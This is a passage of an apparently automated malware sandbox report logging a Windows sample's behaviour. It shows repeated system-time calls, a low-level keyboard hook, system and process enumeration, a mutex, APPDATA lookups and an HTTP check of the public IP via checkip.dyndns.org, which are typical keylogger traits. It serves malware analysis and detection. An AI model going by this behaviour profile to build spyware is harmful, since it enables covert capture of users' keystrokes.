| Get Time | type = System Time, time = 2018-04-18 04:46:43 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:44 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:45 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:46 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:47 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:48 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:49 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:50 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:51 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:52 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:53 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:54 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:55 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:56 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:57 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:58 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:46:59 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:00 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:01 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:02 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:03 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:04 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:05 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:06 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:07 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:08 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:09 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:10 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:11 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:12 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:13 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:14 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:15 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:16 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:17 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:18 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:19 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:20 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:21 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:22 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:23 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:24 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:25 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:26 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:27 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:28 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:29 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:31 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:32 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:33 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:34 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:35 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:36 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:37 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:38 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:39 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:40 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:41 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:42 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:43 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:44 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:45 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:46 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:47 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:48 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:49 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:50 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:51 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:52 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:53 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:54 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:55 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:56 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:57 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:58 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:47:59 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:00 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:01 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:02 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:03 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:04 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:05 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:06 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:07 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:08 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:09 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:10 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:11 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:12 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:13 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:14 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:15 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:16 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:17 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:18 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:19 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:20 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:21 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:22 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:23 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:24 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:25 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:26 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:27 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:28 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:29 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:30 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:31 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:32 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:33 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:34 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:35 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:36 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:37 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:39 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:40 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:41 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:42 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:43 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:44 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:45 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:46 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:47 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:48 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:49 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:50 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:51 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:52 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:53 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:54 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:55 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:56 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:57 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:58 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:48:59 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:00 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:01 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:02 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:03 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:04 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:05 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:06 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:07 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:08 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:09 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:10 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:11 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:12 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:13 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:14 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:15 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:16 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:17 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:18 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:19 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:20 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:21 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:22 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:23 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:24 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:25 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:26 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:49:27 (UTC) |
|
1 | |
| Register Hook | type = WH_KEYBOARD_LL, hookproc_address = 0x241652 |
|
1 | |
| Get Info | type = Operating System |
|
8 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
2 |
Mutex (12)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 |
Environment (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = appdata, result_out = C:\Users\kFT6uTQW\AppData\Roaming |
|
3 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\kFT6uTQW\AppData\Roaming |
|
2 | |
| Get Environment String | name = PROGRAMFILES(x86), result_out = C:\Program Files (x86) |
|
4 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = checkip.dyndns.org, address_out = 216.146.38.70, 216.146.43.71, 91.198.22.70, 216.146.43.70 |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 68 bytes |
| Total Data Received | 260 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | checkip.dyndns.org |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | checkip.dyndns.org |
| Server Port | 80 |
| Data Sent | 68 |
| Data Received | 260 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = checkip.dyndns.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = / |
|
1 | |
| Send HTTP Request | headers = host: checkip.dyndns.org, connection: Keep-Alive, url = checkip.dyndns.org/ |
|
1 | |
| Read Response | size = 4096, size_out = 260 |
|
1 | |
| Close Session | - |
|
1 |
